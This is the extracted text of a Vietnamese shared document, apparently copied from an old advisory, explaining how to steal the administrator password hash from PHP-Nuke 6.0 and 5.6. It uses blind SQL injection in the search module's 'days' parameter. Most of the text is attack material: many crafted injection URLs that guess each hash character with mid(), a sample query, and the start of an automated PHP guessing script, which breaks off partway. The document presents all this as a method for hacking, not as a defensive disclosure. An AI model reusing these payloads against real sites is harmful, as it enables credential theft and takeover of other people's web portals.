intTypePromotion=1
zunia.vn Tuyển sinh 2024 dành cho Gen-Z zunia.vn zunia.vn
ADSENSE

Lấy password của Admin user trên PHPnuke 6

Chia sẻ: Nguyen Van Nam | Ngày: | Loại File: DOC | Số trang:4

147
lượt xem
35
download
 
  Download Vui lòng tải xuống để xem tài liệu đầy đủ

Tham khảo tài liệu 'lấy password của admin user trên phpnuke 6', công nghệ thông tin, an ninh - bảo mật phục vụ nhu cầu học tập, nghiên cứu và làm việc hiệu quả

Chủ đề:
Lưu

Nội dung Text: Lấy password của Admin user trên PHPnuke 6

  1. .Lấy password của Admin user trên PHPnuke 6.0 & 5.6 : trang này đã được đọc  lần  Product:PHP nuke Version:6.0 & 5.6 Problem:PHPNuke SQL Injection  http://cgishield.com/ Ai cũng có thể lấy được password của Admin user trên PHPnuke 6.0 & 5.6 windows+linux method #1 PHPnuke là web portal có open­source đã được sữ dụng rộng rải,có một lổi được tìm thấy đó là điiêù khiiển  từ xa qua SQL injection , với cái này nó cho phép lấy cắp password của administrator's password .Với mọt  đống lộn xôn của pass, Attacker phải login và có thể vào được CP của admin cho viêc điều khiển hệ thống. Lỗi này tồn tại trong search enginebao gồm với PHPnuke (/modules/search/). Ở trong file này, CSDL được  gọi để làm trích ngoài khoảng trống xung quanh user cung cấp biến. Từ khi database gọi việc chọn thông tin  của user từ table,Hacker có thể sữ dụng 'select fish' để tấn công. Nội dung của việc tấn công là hacker xác  định giá trị của ký tự đơn ở trong bất kỳ column trong table được chỉ định trong câu lệnh.. Hầu hết các  column này là quan trọng để hacker lấy đựoc password của admin nhưng được mã hoá chủ yếu là MD5. Chỉ có 16 giá trị cho mổi ký tự và tổng cộng 32 ký tự . chọn " fishing" bao gồm việc sữ dụng hàm của MySQL  là "mid()" kết quả trã về là true nếu ký tự đoán là đúng, bằng cách này ta có thể set results trên màn hình.  Nếu kết quả xuất hiện trên màn hình, Attacker có thể xác định các ký tự đúng,và rồi tiếp tục tiến hành việc  đoán ký tự tiếp thoe trong tiến trình.Bất kỳ md5 password cũng có ít nhất 512 (32*16) lần đoán.Khi bạn đoán  bằng tay,mất chừng khoảng 20­30 minutes, nhưng khi nó là tự đông bằng chương trình thì mất khoảng vài  phút .Chương trình ở cuối tài liệu này.Đây là url đầu tiên mà các hacker khai thác: http://site/modules.php? name=search&query=&topic=&category=&author=&days=1+or+mid(a.pwd,1,1) =6&type=stories Khi phpnuke queries the mysql database, nó có dạng sau: "select s.sid, s.aid, s.informant, s.title, s.time, s.hometext, s.bodytext, a.url, s.comments, s.topic from nuke_stories s, nuke_authors a where s.aid=a.aid AND (s.title LIKE '%%' OR s.hometext LIKE '%%' OR s.bodytext LIKE '%%' OR s.notes LIKE '%%') AND TO_DAYS(NOW()) ­ TO_DAYS (time) 
  2. line 36 of mainfile.php , therefore the following data strings will only work via POST in version 6.0 or later. The exploit included at the end of this file works via POST.) http://site/modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid (a.pwd,1,1)=1&type=stories NO  http://site/modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid (a.pwd,1,1)=2&type=stories No  http://site/modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid (a.pwd,1,1)=3&type=stories No  http://site/modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid (a.pwd,1,1)=4&type=stories No  http://site/modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid (a.pwd,1,1)=5&type=stories No  http://site/modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid (a.pwd,1,1)=6&type=stories Yes  http://site/modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid (a.pwd,1,1)=7&type=stories No  http://site/modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid (a.pwd,1,1)=8&type=stories No  http://site/modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid (a.pwd,1,1)=9&type=stories No  http://site/modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid (a.pwd,1,1)=0&type=stories No  http://site/modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid (a.pwd,1,1)=char(97)&type=stories No  http://site/modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid (a.pwd,1,1)=char(98)&type=stories No  http://site/modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid (a.pwd,1,1)=char(99)&type=stories No  http://site/modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid (a.pwd,1,1)=char(100)&type=stories No  http://site/modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid (a.pwd,1,1)=char(101)&type=stories No 
  3. http://site/modules.php?name=Search&query=&topic=&category=&author=&days=1+or+mid (a.pwd,1,1)=char(102)&type=stories No Ký tự tiếp theo url có dạng http://site/modules.php? name=search&query=&topic=&category=&author=&days=1+or+mid(a.pwd,2,1) =1&type=stories Đây là đoạn mã đoán tự động 
  4. $checkchar[f]="char(102)"; for($i=$beginchar;$i
ADSENSE

CÓ THỂ BẠN MUỐN DOWNLOAD

 

Đồng bộ tài khoản
2=>2